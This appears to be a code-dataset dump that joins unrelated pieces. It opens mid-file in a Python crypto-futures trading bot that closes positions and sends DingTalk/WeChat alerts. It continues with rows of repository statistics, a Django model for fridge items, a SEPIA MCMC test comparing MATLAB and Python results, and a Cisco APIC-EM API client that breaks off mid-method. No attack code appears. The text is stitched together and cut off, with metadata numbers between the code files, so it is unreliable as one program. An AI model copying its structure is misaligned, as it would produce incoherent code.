# Profit, self.last_price, self.high_price, self.low_price)
# self.times = 0
# self.stoploss_price = 0
# self.takeprofit_price = 0
# self.stop_price = 0
# HYJ_jd_tradeType = "平多"
# HYJ_jd_curAmount = "%s" % enter_price
# self.enter_price = 0
# self.high_price = 0
# self.low_price = 0
# self.maxunRealizedProfit = 0
# self.unRealizedProfit = 0
# self.lowProfit = 0
# self.sync_data()
# dingding(f"多单,止盈C,交易所返回:{res_sell}")
# wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
#
# elif self.maxunRealizedProfit > 0.1 and self.high_price - self.last_price > 2:
#
# self.HYJ_jd_ss_old = 1
# res_sell = self.sell(enter_price, abs(self.pos))
# self.HYJ_jd_ss = 0
# HYJ_jd_first = "止盈D:交易对:%s,最大亏损:%s,最大利润:%s,当前利润:%s,仓位:%s" % (
# self.symbol, self.lowProfit, self.maxunRealizedProfit, self.unRealizedProfit, self.pos)
# self.pos = 0
# HYJ_jd_remark = "净利:%s,最新价:%s,最高价:%s,最低价:%s" % (
# Profit, self.last_price, self.high_price, self.low_price)
# self.times = 0
# self.stoploss_price = 0
# self.takeprofit_price = 0
# self.stop_price = 0
# HYJ_jd_tradeType = "平多"
# HYJ_jd_curAmount = "%s" % enter_price
# self.enter_price = 0
# self.high_price = 0
# self.low_price = 0
# self.maxunRealizedProfit = 0
# self.unRealizedProfit = 0
# self.lowProfit = 0
# self.sync_data()
# dingding(f"多单,止盈D,交易所返回:{res_sell}")
# wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
#
# elif self.maxunRealizedProfit > 0.05 and self.high_price - self.last_price > 2:
#
# self.HYJ_jd_ss_old = 1
# res_sell = self.sell(enter_price, abs(self.pos))
# self.HYJ_jd_ss = 0
# HYJ_jd_first = "止盈E:交易对:%s,最大亏损:%s,最大利润:%s,当前利润:%s,仓位:%s" % (
# self.symbol, self.lowProfit, self.maxunRealizedProfit, self.unRealizedProfit, self.pos)
# self.pos = 0
# HYJ_jd_remark = "净利:%s,最新价:%s,最高价:%s,最低价:%s" % (
# Profit, self.last_price, self.high_price, self.low_price)
# self.times = 0
# self.stoploss_price = 0
# self.takeprofit_price = 0
# self.stop_price = 0
# HYJ_jd_tradeType = "平多"
# HYJ_jd_curAmount = "%s" % enter_price
# self.enter_price = 0
# self.high_price = 0
# self.low_price = 0
# self.maxunRealizedProfit = 0
# self.unRealizedProfit = 0
# self.lowProfit = 0
# self.sync_data()
# dingding(f"多单,止盈E,交易所返回:{res_sell}")
# wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
elif self.pos < 0: # 空单持仓
enter_price = self.ask2
Profit = self.round_to((self.enter_price - enter_price) * abs(self.pos), self.min_price)
if self.HYJ_jd_ss == -11:
self.HYJ_jd_ss_old = -1
self.stop_price = 0
res_sell = self.buy(enter_price, abs(self.pos), mark=True) # 平空
self.HYJ_jd_ss = 0
HYJ_jd_first = "趋势反转平空:交易对:%s,最大亏损:%s,最大利润:%s,当前利润:%s,仓位:%s" % (
self.symbol, self.lowProfit, self.maxunRealizedProfit, self.unRealizedProfit, self.pos)
self.pos = 0
HYJ_jd_remark = "趋势反转平空:%s,最新价:%s,最高价:%s,最低价:%s" % (
Profit, self.last_price, self.high_price, self.low_price)
HYJ_jd_tradeType = "平空"
HYJ_jd_curAmount = "%s" % self.enter_price
self.stoploss_price = 0
self.takeprofit_price = 0
self.enter_price = 0
self.high_price = 0
self.low_price = 0
self.maxunRealizedProfit = 0
self.unRealizedProfit = 0
self.lowProfit = 0
self.sync_data()
dingding(f"趋势反转平空,交易所返回:{res_sell}", symbols=self.symbol)
wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
elif self.HYJ_jd_ss == -22:
self.HYJ_jd_ss_old = -1
self.stop_price = 0
res_sell = self.buy(enter_price, abs(self.pos), mark=True) # 平空
self.HYJ_jd_ss = 0
HYJ_jd_first = "趋势收缩平空:交易对:%s,最大亏损:%s,最大利润:%s,当前利润:%s,仓位:%s" % (
self.symbol, self.lowProfit, self.maxunRealizedProfit, self.unRealizedProfit, self.pos)
self.pos = 0
HYJ_jd_remark = "趋势收缩平空:%s,最新价:%s,最高价:%s,最低价:%s" % (
Profit, self.last_price, self.high_price, self.low_price)
HYJ_jd_tradeType = "平空"
HYJ_jd_curAmount = "%s" % self.enter_price
self.stoploss_price = 0
self.takeprofit_price = 0
self.enter_price = 0
self.high_price = 0
self.low_price = 0
self.maxunRealizedProfit = 0
self.unRealizedProfit = 0
self.lowProfit = 0
self.sync_data()
dingding(f"趋势收缩平空,交易所返回:{res_sell}", symbols=self.symbol)
wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
elif self.stoploss_price != 0 and self.last_price > self.stoploss_price:
self.HYJ_jd_ss_old = -1
self.stop_price = 0
res_sell = self.buy(enter_price, abs(self.pos), mark=True) # 平空
self.HYJ_jd_ss = 0
self.times += 1 # 这个是连续亏损计数
HYJ_jd_first = "止损平空:交易对:%s,最大亏损:%s,最大利润:%s,当前利润:%s,仓位:%s" % (
self.symbol, self.lowProfit, self.maxunRealizedProfit, self.unRealizedProfit, self.pos)
self.pos = 0
HYJ_jd_remark = "止损:%s,最新价:%s,最高价:%s,最低价:%s" % (
Profit, self.last_price, self.high_price, self.low_price)
HYJ_jd_tradeType = "平空"
HYJ_jd_curAmount = "%s" % self.enter_price
self.stoploss_price = 0
self.takeprofit_price = 0
self.enter_price = 0
self.high_price = 0
self.low_price = 0
self.maxunRealizedProfit = 0
self.unRealizedProfit = 0
self.lowProfit = 0
self.sync_data()
dingding(f"止损平空,交易所返回:{res_sell}")
wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
elif self.takeprofit_price > self.last_price:
self.HYJ_jd_ss_old = -1
res_sell = self.buy(enter_price, abs(self.pos), mark=True) # 平空
self.HYJ_jd_ss = 0
HYJ_jd_first = "止盈A:交易对:%s,最大亏损:%s,最大利润:%s,当前利润:%s,仓位:%s" % (
self.symbol, self.lowProfit, self.maxunRealizedProfit, self.unRealizedProfit, self.pos)
self.pos = 0
HYJ_jd_tradeType = "平空"
HYJ_jd_curAmount = "%s" % self.enter_price
HYJ_jd_remark = "净利:%s,最新价:%s,最高价:%s,最低价:%s" % (
Profit, self.last_price, self.high_price, self.low_price)
self.times = 0
self.stoploss_price = 0
self.takeprofit_price = 0
self.stop_price = 0
self.enter_price = 0
self.high_price = 0
self.low_price = 0
self.maxunRealizedProfit = 0
self.unRealizedProfit = 0
self.lowProfit = 0
self.sync_data()
dingding(f"空单,止盈A,交易所返回:{res_sell}")
wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
# elif self.unRealizedProfit > 0.1 and self.last_price - self.low_price > 1:
#
# self.HYJ_jd_ss_old = -1
# res_sell = self.buy(enter_price, abs(self.pos)) # 平空
# self.HYJ_jd_ss = 0
# HYJ_jd_first = "止盈B:交易对:%s,最大亏损:%s,最大利润:%s,当前利润:%s,仓位:%s" % (
# self.symbol, self.lowProfit, self.maxunRealizedProfit, self.unRealizedProfit, self.pos)
# self.pos = 0
# HYJ_jd_tradeType = "平空"
# HYJ_jd_curAmount = "%s" % self.enter_price
# HYJ_jd_remark = "净利:%s,最新价:%s,最高价:%s,最低价:%s" % (
# Profit, self.last_price, self.high_price, self.low_price)
# self.times = 0
# self.stoploss_price = 0
# self.takeprofit_price = 0
# self.stop_price = 0
# self.enter_price = 0
# self.high_price = 0
# self.low_price = 0
# self.maxunRealizedProfit = 0
# self.unRealizedProfit = 0
# self.lowProfit = 0
# self.sync_data()
# dingding(f"空单,止盈B,交易所返回:{res_sell}")
# wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
#
# elif self.unRealizedProfit > 0.05 and self.last_price - self.low_price > 1:
#
# self.HYJ_jd_ss_old = -1
# res_sell = self.buy(enter_price, abs(self.pos)) # 平空
# self.HYJ_jd_ss = 0
# HYJ_jd_first = "止盈C:交易对:%s,最大亏损:%s,最大利润:%s,当前利润:%s,仓位:%s" % (
# self.symbol, self.lowProfit, self.maxunRealizedProfit, self.unRealizedProfit, self.pos)
# self.pos = 0
# HYJ_jd_tradeType = "平空"
# HYJ_jd_curAmount = "%s" % self.enter_price
# HYJ_jd_remark = "净利:%s,最新价:%s,最高价:%s,最低价:%s" % (
# Profit, self.last_price, self.high_price, self.low_price)
# self.times = 0
# self.stoploss_price = 0
# self.takeprofit_price = 0
# self.stop_price = 0
# self.enter_price = 0
# self.high_price = 0
# self.low_price = 0
# self.maxunRealizedProfit = 0
# self.unRealizedProfit = 0
# self.lowProfit = 0
# self.sync_data()
# dingding(f"空单,止盈C,交易所返回:{res_sell}")
# wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
#
# elif self.maxunRealizedProfit > 0.1 and self.last_price - self.low_price > 2:
#
# self.HYJ_jd_ss_old = -1
# res_sell = self.buy(enter_price, abs(self.pos)) # 平空
# self.HYJ_jd_ss = 0
# HYJ_jd_first = "止盈D:交易对:%s,最大亏损:%s,最大利润:%s,当前利润:%s,仓位:%s" % (
# self.symbol, self.lowProfit, self.maxunRealizedProfit, self.unRealizedProfit, self.pos)
# self.pos = 0
# HYJ_jd_tradeType = "平空"
# HYJ_jd_curAmount = "%s" % self.enter_price
# HYJ_jd_remark = "净利:%s,最新价:%s,最高价:%s,最低价:%s" % (
# Profit, self.last_price, self.high_price, self.low_price)
# self.times = 0
# self.stoploss_price = 0
# self.takeprofit_price = 0
# self.stop_price = 0
# self.enter_price = 0
# self.high_price = 0
# self.low_price = 0
# self.maxunRealizedProfit = 0
# self.unRealizedProfit = 0
# self.lowProfit = 0
# self.sync_data()
# dingding(f"空单,止盈D,交易所返回:{res_sell}")
# wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
#
# elif self.maxunRealizedProfit > 0.05 and self.last_price - self.low_price > 2:
#
# self.HYJ_jd_ss_old = -1
# res_sell = self.buy(enter_price, abs(self.pos)) # 平空
# self.HYJ_jd_ss = 0
# HYJ_jd_first = "止盈E:交易对:%s,最大亏损:%s,最大利润:%s,当前利润:%s,仓位:%s" % (
# self.symbol, self.lowProfit, self.maxunRealizedProfit, self.unRealizedProfit, self.pos)
# self.pos = 0
# HYJ_jd_tradeType = "平空"
# HYJ_jd_curAmount = "%s" % self.enter_price
# HYJ_jd_remark = "净利:%s,最新价:%s,最高价:%s,最低价:%s" % (
# Profit, self.last_price, self.high_price, self.low_price)
# self.times = 0
# self.stoploss_price = 0
# self.takeprofit_price = 0
# self.stop_price = 0
# self.enter_price = 0
# self.high_price = 0
# self.low_price = 0
# self.maxunRealizedProfit = 0
# self.unRealizedProfit = 0
# self.lowProfit = 0
# self.sync_data()
# dingding(f"空单,止盈E,交易所返回:{res_sell}")
# wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
| 53.059774
| 130
| 0.493119
| 3,681
| 32,844
| 4.131758
| 0.044281
| 0.073969
| 0.057203
| 0.034716
| 0.908015
| 0.893944
| 0.883096
| 0.870143
| 0.870143
| 0.859886
| 0
| 0.017214
| 0.407472
| 32,844
| 618
| 131
| 53.145631
| 0.764298
| 0.243119
| 0
| 0.753968
| 0
| 0.02381
| 0.060326
| 0.048473
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007937
| false
| 0
| 0.007937
| 0
| 0.02381
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0bad3eb696ee5cd5240656eb13ce329d03ddd15b
| 1,306
|
py
|
Python
|
fridge_web/my_fridge/models.py
|
logiflo/snowplow-embeded-fridge
|
8d356f8c5f225de7a50c04ac9a88c4b3ae89d7cd
|
[
"BSD-2-Clause"
] | 1
|
2020-08-28T08:32:35.000Z
|
2020-08-28T08:32:35.000Z
|
my_fridge/models.py
|
logiflo/fridge-django
|
07fe585d65698ac78a2499ec1674738859324d05
|
[
"BSD-2-Clause"
] | null | null | null |
my_fridge/models.py
|
logiflo/fridge-django
|
07fe585d65698ac78a2499ec1674738859324d05
|
[
"BSD-2-Clause"
] | null | null | null |
from django.db import models
from django.contrib.auth.models import User
class Essencial(models.Model):
"""Essencials in your fridge.
"""
text = models.CharField(max_length=200)
date_added = models.DateTimeField(auto_now_add=True)
owner = models.ForeignKey(User, on_delete=models.CASCADE)
UNIT_CHOICES =[
('Kg', 'Kilogram'),
('g', 'Gram'),
('L', 'Litre'),
('unit', 'Unit'),
]
units = models.CharField(max_length=15, choices=UNIT_CHOICES)
quantity = models.FloatField(default=0.0)
def __str__(self):
"""Return a string representation of the model
"""
return self.text
class Food(models.Model):
"""Food in the fridge.
"""
text = models.CharField(max_length=200)
date_added = models.DateTimeField(auto_now_add=True)
owner = models.ForeignKey(User, on_delete=models.CASCADE)
UNIT_CHOICES =[
('Kg', 'Kilogram'),
('g', 'Gram'),
('L', 'Litre'),
('unit', 'Unit'),
]
units = models.CharField(max_length=15, choices=UNIT_CHOICES)
quantity = models.FloatField(default=0.0)
class Meta:
verbose_name_plural = 'Food'
def __str__(self):
"""Return a string representation of the model
"""
return self.text
| 24.641509
| 65
| 0.614855
| 154
| 1,306
| 5.045455
| 0.38961
| 0.07722
| 0.092664
| 0.123552
| 0.792793
| 0.792793
| 0.792793
| 0.792793
| 0.792793
| 0.792793
| 0
| 0.014242
| 0.24732
| 1,306
| 52
| 66
| 25.115385
| 0.776195
| 0.117152
| 0
| 0.75
| 0
| 0
| 0.055258
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0625
| false
| 0
| 0.0625
| 0
| 0.65625
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
e7ffe12f3f73e69c4371e3fe8b1948d9b38b6ed7
| 10,625
|
py
|
Python
|
dev/dev_test/SepiaMCMCTestCase.py
|
lanl/SEPIA
|
0a1e606e1d1072f49e4f3f358962bd8918a5d3a3
|
[
"BSD-3-Clause"
] | 19
|
2020-06-22T16:37:07.000Z
|
2022-02-18T22:50:59.000Z
|
dev/dev_test/SepiaMCMCTestCase.py
|
lanl/SEPIA
|
0a1e606e1d1072f49e4f3f358962bd8918a5d3a3
|
[
"BSD-3-Clause"
] | 41
|
2020-07-07T22:52:33.000Z
|
2021-11-04T14:05:03.000Z
|
dev/dev_test/SepiaMCMCTestCase.py
|
lanl/SEPIA
|
0a1e606e1d1072f49e4f3f358962bd8918a5d3a3
|
[
"BSD-3-Clause"
] | 6
|
2020-08-14T18:58:45.000Z
|
2022-03-01T21:00:14.000Z
|
import unittest
import numpy as np
from time import time
from setup_test_cases import *
"""
NOTE: requires matlab.engine.
To install at command line:
> source activate <sepia conda env name>
> cd <matlabroot>/extern/engines/python
> python setup.py install
"""
class SepiaMCMCTestCase(unittest.TestCase):
"""
Checks MCMC results between matlab and python.
Run files in matlab/ dir to generate data prior to running these tests.
"""
def test_mcmc_univ_sim_only(self):
print('starting test_mcmc_univ_sim_only', flush=True)
show_figs = True
seed = 42.
n_mcmc = 100
m = 300
# call function to do matlab setup/sampling
model, matlab_output = setup_univ_sim_only(m=m, seed=seed, n_mcmc=n_mcmc)
mcmc_time_mat = matlab_output['mcmc_time']
mcmc_mat = matlab_output['mcmc']
mcmc_mat = {k: np.array(mcmc_mat[k]) for k in mcmc_mat.keys()}
# do python sampling
np.random.seed(int(seed))
t_start = time()
model.do_mcmc(n_mcmc)
t_end = time()
print('Python mcmc time %0.3g s' % (t_end - t_start), flush=True)
print('Matlab mcmc time %0.3g s' % mcmc_time_mat, flush=True)
samples_dict = {p.name: p.mcmc_to_array() for p in model.params.mcmcList}
samples_dict['logPost'] = np.array(model.params.lp.mcmc.draws).reshape((-1, 1))
self.assertTrue(set(samples_dict.keys()) == set(mcmc_mat.keys()))
if show_figs:
import matplotlib.pyplot as plt
for i, k in enumerate(samples_dict.keys()):
param_shape = samples_dict[k].shape[1]
plt.figure(i)
for j in range(param_shape):
plt.subplot(1, param_shape, j+1)
plt.hist(samples_dict[k][:, j], alpha=0.5)
plt.hist(mcmc_mat[k][:, j], alpha=0.5)
plt.xlabel(k)
plt.legend(['python', 'matlab'])
plt.show()
for k in samples_dict.keys():
self.assertTrue(np.allclose(np.mean(samples_dict[k], 0), np.mean(mcmc_mat[k], 0)))
self.assertTrue(np.allclose(np.std(samples_dict[k], 0), np.std(mcmc_mat[k], 0)))
def test_mcmc_univ_sim_and_obs(self):
print('starting test_mcmc_univ_sim_and_obs', flush=True)
show_figs = 1
seed = 42.
n_mcmc = 100
m = 100
n = 10
model, matlab_output = setup_univ_sim_and_obs(m=m, n=n, seed=seed, n_mcmc=n_mcmc)
mcmc_time_mat = matlab_output['mcmc_time']
mcmc_mat = matlab_output['mcmc']
mcmc_mat = {k: np.array(mcmc_mat[k]) for k in mcmc_mat.keys()}
# do python sampling
np.random.seed(int(seed))
t_start = time()
model.do_mcmc(n_mcmc)
t_end = time()
print('Python mcmc time %0.3g s' % (t_end - t_start), flush=True)
print('Matlab mcmc time %0.3g s' % mcmc_time_mat, flush=True)
samples_dict = {p.name: p.mcmc_to_array() for p in model.params.mcmcList}
samples_dict['logPost'] = np.array(model.params.lp.mcmc.draws).reshape((-1, 1))
self.assertTrue(set(samples_dict.keys()) == set(mcmc_mat.keys()))
if show_figs:
import matplotlib.pyplot as plt
for i, k in enumerate(samples_dict.keys()):
param_shape = samples_dict[k].shape[1]
plt.figure(i)
for j in range(param_shape):
plt.subplot(1, param_shape, j + 1)
plt.hist(samples_dict[k][:, j], alpha=0.5)
plt.hist(mcmc_mat[k][:, j], alpha=0.5)
plt.xlabel(k)
plt.legend(['python', 'matlab'])
plt.show()
for k in samples_dict.keys():
self.assertTrue(np.allclose(np.mean(samples_dict[k], 0), np.mean(mcmc_mat[k], 0)))
self.assertTrue(np.allclose(np.std(samples_dict[k], 0), np.std(mcmc_mat[k], 0)))
def test_mcmc_multi_sim_only(self):
print('starting test_mcmc_multi_sim_only', flush=True)
show_figs = True
seed = 42.
n_mcmc = 30
m = 20
nt = 10
n_pc = 4
nx = 5
model, matlab_output = setup_multi_sim_only(m=m, nt=nt, nx=nx, n_pc=n_pc, seed=seed, n_mcmc=n_mcmc)
mcmc_time_mat = matlab_output['mcmc_time']
mcmc_mat = matlab_output['mcmc']
mcmc_mat = {k: np.array(mcmc_mat[k]) for k in mcmc_mat.keys()}
# do python sampling
np.random.seed(int(seed))
t_start = time()
model.do_mcmc(n_mcmc)
t_end = time()
print('Python mcmc time %0.3g s' % (t_end - t_start), flush=True)
print('Matlab mcmc time %0.3g s' % mcmc_time_mat, flush=True)
samples_dict = {p.name: p.mcmc_to_array() for p in model.params.mcmcList}
samples_dict['logPost'] = np.array(model.params.lp.mcmc.draws).reshape((-1, 1))
self.assertTrue(set(samples_dict.keys()) == set(mcmc_mat.keys()))
if show_figs:
import matplotlib.pyplot as plt
for i, k in enumerate(samples_dict.keys()):
param_shape = samples_dict[k].shape[1]
if param_shape >= 5:
ncol = 5
nrow = int(np.ceil(param_shape / ncol))
else:
ncol = param_shape
nrow = 1
plt.figure(i)
for j in range(param_shape):
plt.subplot(nrow, ncol, j + 1)
plt.hist(samples_dict[k][:, j], alpha=0.5)
plt.hist(mcmc_mat[k][:, j], alpha=0.5)
plt.xlabel(k)
plt.legend(['python', 'matlab'])
plt.show()
for k in samples_dict.keys():
self.assertTrue(np.allclose(np.mean(samples_dict[k], 0), np.mean(mcmc_mat[k], 0)))
self.assertTrue(np.allclose(np.std(samples_dict[k], 0), np.std(mcmc_mat[k], 0)))
def test_mcmc_multi_sim_and_obs(self):
print('starting test_mcmc_multi_sim_and_obs', flush=True)
show_figs = True
seed = 42.
n_mcmc = 20
m = 200
n = 20
nt_sim = 75
nt_obs = 50
n_pc = 5 # must be smaller than nt
nx = 3
noise_sd = 0.1
model, matlab_output = setup_multi_sim_and_obs(m=m, n=n, nt_sim=nt_sim, nt_obs=nt_obs, noise_sd=noise_sd,
nx=nx, n_pc=n_pc, seed=seed, n_lik=0, n_mcmc=n_mcmc)
mcmc_time_mat = matlab_output['mcmc_time']
mcmc_mat = matlab_output['mcmc']
mcmc_mat = {k: np.array(mcmc_mat[k]) for k in mcmc_mat.keys()}
# do python sampling
np.random.seed(int(seed))
t_start = time()
model.do_mcmc(n_mcmc)
t_end = time()
print('Python mcmc time %0.3g s' % (t_end - t_start), flush=True)
print('Matlab mcmc time %0.3g s' % mcmc_time_mat, flush=True)
samples_dict = {p.name: p.mcmc_to_array() for p in model.params.mcmcList}
samples_dict['logPost'] = np.array(model.params.lp.mcmc.draws).reshape((-1, 1))
self.assertTrue(set(samples_dict.keys()) == set(mcmc_mat.keys()))
if show_figs:
import matplotlib.pyplot as plt
for i, k in enumerate(samples_dict.keys()):
param_shape = samples_dict[k].shape[1]
if param_shape >= 5:
ncol = 5
nrow = int(np.ceil(param_shape / ncol))
else:
ncol = param_shape
nrow = 1
plt.figure(i)
for j in range(param_shape):
plt.subplot(nrow, ncol, j + 1)
plt.hist(samples_dict[k][:, j], alpha=0.5)
plt.hist(mcmc_mat[k][:, j], alpha=0.5)
plt.xlabel(k)
plt.legend(['python', 'matlab'])
plt.show()
for k in samples_dict.keys():
self.assertTrue(np.allclose(np.mean(samples_dict[k], 0), np.mean(mcmc_mat[k], 0)))
self.assertTrue(np.allclose(np.std(samples_dict[k], 0), np.std(mcmc_mat[k], 0)))
def test_mcmc_multi_sim_and_obs_noD(self):
print('starting test_mcmc_multi_sim_and_obs_noD', flush=True)
show_figs = True
seed = 42.
n_mcmc = 20
m = 200
n = 20
nt_sim = 75
nt_obs = 50
n_pc = 5 # must be smaller than nt
nx = 3
noise_sd = 0.1
model, matlab_output = setup_multi_sim_and_obs_noD(m=m, n=n, nt_sim=nt_sim, nt_obs=nt_obs, noise_sd=noise_sd,
nx=nx, n_pc=n_pc, seed=seed, n_lik=0, n_mcmc=n_mcmc)
mcmc_time_mat = matlab_output['mcmc_time']
mcmc_mat = matlab_output['mcmc']
mcmc_mat = {k: np.array(mcmc_mat[k]) for k in mcmc_mat.keys()}
# do python sampling
np.random.seed(int(seed))
t_start = time()
model.do_mcmc(n_mcmc)
t_end = time()
print('Python mcmc time %0.3g s' % (t_end - t_start), flush=True)
print('Matlab mcmc time %0.3g s' % mcmc_time_mat, flush=True)
samples_dict = {p.name: p.mcmc_to_array() for p in model.params.mcmcList}
samples_dict['logPost'] = np.array(model.params.lp.mcmc.draws).reshape((-1, 1))
self.assertTrue(set(samples_dict.keys()) == set(mcmc_mat.keys()))
if show_figs:
import matplotlib.pyplot as plt
for i, k in enumerate(samples_dict.keys()):
param_shape = samples_dict[k].shape[1]
if param_shape >= 5:
ncol = 5
nrow = int(np.ceil(param_shape / ncol))
else:
ncol = param_shape
nrow = 1
plt.figure(i)
for j in range(param_shape):
plt.subplot(nrow, ncol, j + 1)
plt.hist(samples_dict[k][:, j], alpha=0.5)
plt.hist(mcmc_mat[k][:, j], alpha=0.5)
plt.xlabel(k)
plt.legend(['python', 'matlab'])
plt.show()
for k in samples_dict.keys():
self.assertTrue(np.allclose(np.mean(samples_dict[k], 0), np.mean(mcmc_mat[k], 0)))
self.assertTrue(np.allclose(np.std(samples_dict[k], 0), np.std(mcmc_mat[k], 0)))
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(SepiaMCMCTestCase)
unittest.TextTestRunner(verbosity=2).run(suite)
| 37.15035
| 117
| 0.553976
| 1,519
| 10,625
| 3.666228
| 0.098091
| 0.088885
| 0.035913
| 0.034117
| 0.906446
| 0.903214
| 0.883821
| 0.862453
| 0.856348
| 0.840546
| 0
| 0.02176
| 0.320941
| 10,625
| 286
| 118
| 37.15035
| 0.750104
| 0.028612
| 0
| 0.850467
| 0
| 0
| 0.057696
| 0.012942
| 0
| 0
| 0
| 0
| 0.070093
| 1
| 0.023364
| false
| 0
| 0.042056
| 0
| 0.070093
| 0.070093
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f004bc335bbb5d07fa172b2362fbbaa1cf3e432c
| 8,005
|
py
|
Python
|
apis/nb/clients/identity_manager_client/V2NeighborhoodApi.py
|
CiscoDevNet/APIC-EM-Generic-Scripts-
|
74211d9488f1e77cf56ef86dba20ec8e8eb49cc1
|
[
"ECL-2.0",
"Apache-2.0"
] | 45
|
2016-06-09T15:41:25.000Z
|
2019-08-06T17:13:11.000Z
|
apis/nb/clients/identity_manager_client/V2NeighborhoodApi.py
|
CiscoDevNet/APIC-EM-Generic-Scripts
|
74211d9488f1e77cf56ef86dba20ec8e8eb49cc1
|
[
"ECL-2.0",
"Apache-2.0"
] | 36
|
2016-06-12T03:03:56.000Z
|
2017-03-13T18:20:11.000Z
|
apis/nb/clients/identity_manager_client/V2NeighborhoodApi.py
|
CiscoDevNet/APIC-EM-Generic-Scripts
|
74211d9488f1e77cf56ef86dba20ec8e8eb49cc1
|
[
"ECL-2.0",
"Apache-2.0"
] | 15
|
2016-06-22T03:51:37.000Z
|
2019-07-10T10:06:02.000Z
|
#!/usr/bin/env python
#pylint: skip-file
# This source code is licensed under the Apache license found in the
# LICENSE file in the root directory of this project.
import sys
import os
import urllib.request, urllib.parse, urllib.error
from .models import *
class V2NeighborhoodApi(object):
def __init__(self, apiClient):
self.apiClient = apiClient
def getAllNeighbors(self, **kwargs):
"""Lists all neighborhood
Args:
Returns: NeighborhoodListResult
"""
allParams = []
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method getAllNeighbors" % key)
params[key] = val
del params['kwargs']
resourcePath = '/v2/neighborhood'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'GET'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
headerParams['Accept'] = 'application/json'
headerParams['Content-Type'] = 'application/json'
postData = (formParams if formParams else bodyParam)
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams, files=files)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'NeighborhoodListResult')
return responseObject
def updateNeighbor(self, **kwargs):
"""Update Neighbor(s)
Args:
nbr, NeighborhoodDTO: Neighborhood Object (required)
Returns: TaskIdResult
"""
allParams = ['nbr']
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method updateNeighbor" % key)
params[key] = val
del params['kwargs']
resourcePath = '/v2/neighborhood'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'PUT'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
headerParams['Accept'] = 'application/json'
headerParams['Content-Type'] = 'application/json'
if ('nbr' in params):
bodyParam = params['nbr']
postData = (formParams if formParams else bodyParam)
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams, files=files)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'TaskIdResult')
return responseObject
def addNeighbor(self, **kwargs):
"""Create Neighbor(s)
Args:
nbr, NeighborhoodDTO: Neighborhood Object (required)
Returns: TaskIdResult
"""
allParams = ['nbr']
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method addNeighbor" % key)
params[key] = val
del params['kwargs']
resourcePath = '/v2/neighborhood'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'POST'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
headerParams['Accept'] = 'application/json'
headerParams['Content-Type'] = 'application/json'
if ('nbr' in params):
bodyParam = params['nbr']
postData = (formParams if formParams else bodyParam)
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams, files=files)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'TaskIdResult')
return responseObject
def getNeighbor(self, **kwargs):
"""List a neighborhood
Args:
id, str: Retrieve Neighborhood for a given UUID (required)
Returns: NeighborhoodResult
"""
allParams = ['id']
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method getNeighbor" % key)
params[key] = val
del params['kwargs']
resourcePath = '/v2/neighborhood/{id}'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'GET'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
headerParams['Accept'] = 'application/json'
headerParams['Content-Type'] = 'application/json'
if ('id' in params):
replacement = str(self.apiClient.toPathValue(params['id']))
replacement = urllib.parse.quote(replacement)
resourcePath = resourcePath.replace('{' + 'id' + '}',
replacement)
postData = (formParams if formParams else bodyParam)
